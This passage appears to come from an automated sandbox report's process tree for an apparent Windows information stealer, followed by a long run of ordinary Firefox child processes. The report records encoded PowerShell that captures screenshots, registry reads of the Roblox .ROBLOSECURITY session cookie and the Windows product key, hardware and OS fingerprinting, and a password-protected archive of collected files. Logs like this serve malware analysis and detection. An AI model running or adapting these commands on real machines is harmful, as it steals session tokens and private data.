wBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3244
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a5dauy0w\a5dauy0w.cmdline"
        5⤵
        
        PID:732
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA75C.tmp" "c:\Users\Admin\AppData\Local\Temp\a5dauy0w\CSC82769E8940E4BF1ABD7B45D675AAC39.TMP"
        6⤵
        
        PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4784
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5032
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3776
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3200
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3800
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2708
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3312
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4416
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2480
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1816
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\AOt4k.zip" *"
    3⤵
    PID:1772
  - - C:\Users\Admin\AppData\Local\Temp\_MEI322\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\AOt4k.zip" *
      4⤵
      Executes dropped EXE
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:548

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe be33c0f83fcef21afd0f1b55d882cedd 2fcAcitP1EWe3DgUEvtY0A.0.1.0.0.0
1⤵
PID:3200

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2060
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2740
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1960 -prefMapHandle 1952 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {12435b36-c11d-4bb0-9a21-27fb53b237f8} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" gpu
    3⤵
    PID:1712
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2444 -parentBuildID 20240401114208 -prefsHandle 2420 -prefMapHandle 2416 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b2d273c-6ec2-4e07-9ee7-5fe4faaf7eb5} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" socket
    3⤵
    - Checks processor information in registry
    PID:404
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3064 -childID 1 -isForBrowser -prefsHandle 3088 -prefMapHandle 3084 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0f0f9e3-b6cb-499c-befe-a5293fb03bfc} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5076
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3896 -childID 2 -isForBrowser -prefsHandle 3884 -prefMapHandle 3860 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4294feb9-41b6-465e-a5e8-5e7d26d9a38c} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:4128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4960 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4916 -prefMapHandle 4924 -prefsLen 29197 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4e0e254-d3ef-405b-9412-34a1ca64d9b3} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" utility
    3⤵
    - Checks processor information in registry
    PID:4652
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3432 -childID 3 -isForBrowser -prefsHandle 5336 -prefMapHandle 3348 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d1d1a67-5240-417b-84b3-797441ab0ad6} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:672
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 4 -isForBrowser -prefsHandle 5548 -prefMapHandle 5332 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b4f73f2e-fbd9-4659-800b-37db2fd9a221} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:1012
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5856 -childID 5 -isForBrowser -prefsHandle 5848 -prefMapHandle 5844 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e77acfe1-fece-440f-81d2-64a11027da00} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:3468
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4056 -childID 6 -isForBrowser -prefsHandle 4108 -prefMapHandle 4124 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d0698d5-88de-435e-8f9b-a1da92072f47} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5240
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3280 -childID 7 -isForBrowser -prefsHandle 4664 -prefMapHandle 4660 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ca886501-32e7-40ad-b48f-6cf23945d64e} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5252
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6076 -childID 8 -isForBrowser -prefsHandle 3596 -prefMapHandle 5964 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7b6b085-2945-4e6b-978a-a65b88075a77} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5264
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6196 -childID 9 -isForBrowser -prefsHandle 6276 -prefMapHandle 6272 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {03085a5d-2a67-41e2-bd95-9e86ad342e6e} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5276
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6428 -childID 10 -isForBrowser -prefsHandle 6172 -prefMapHandle 6176 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e5cfd92-5916-4c50-b400-72e3df41d624} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5288
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6656 -childID 11 -isForBrowser -prefsHandle 6576 -prefMapHandle 6580 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e482a8e-e7bd-4604-a315-057bd459e10e} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5300
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6784 -childID 12 -isForBrowser -prefsHandle 6860 -prefMapHandle 6856 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d58b3357-02d3-4e19-8d40-a459f7028030} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5312
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7040 -childID 13 -isForBrowser -prefsHandle 6560 -prefMapHandle 6656 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dfb59ce-06fe-4ea0-bd7b-4db9342d1493} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5324
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7144 -childID 14 -isForBrowser -prefsHandle 7152 -prefMapHandle 7156 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68b1cb95-4f4b-48c6-bd38-a56ea239bf7d} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5340
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7392 -childID 15 -isForBrowser -prefsHandle 7404 -prefMapHandle 7348 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89c20799-3624-4e38-88ae-2db14ee7de94} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5352
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7560 -childID 16 -isForBrowser -prefsHandle 7568 -prefMapHandle 7572 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f374388-8aaa-4442-aea1-5c71925b91bc} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5364
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7744 -childID 17 -isForBrowser -prefsHandle 7752 -prefMapHandle 7756 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07c86cce-62ba-44e6-93d0-51009e346334} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5376
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7944 -childID 18 -isForBrowser -prefsHandle 7952 -prefMapHandle 7956 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b001b05f-c62b-473f-b5a4-26d720528258} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5388
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8128 -childID 19 -isForBrowser -prefsHandle 8136 -prefMapHandle 8140 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d54ff9bb-d0f9-4f13-a21f-f4d5612cb7c5} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5400
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8424 -childID 20 -isForBrowser -prefsHandle 8412 -prefMapHandle 8408 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e18f6aa0-a371-40b6-b696-3d69cb279d59} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5456
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8672 -childID 21 -isForBrowser -prefsHandle 8664 -prefMapHandle 8660 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1012 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e79630d-7390-46b5-aa90-83212c6b91eb} 2740 "\\.\pipe\gecko-crash-server-pipe.2740" tab
    3⤵
    PID:5472
- - C:\Program Files\Mozilla Firefox\firefox.exe
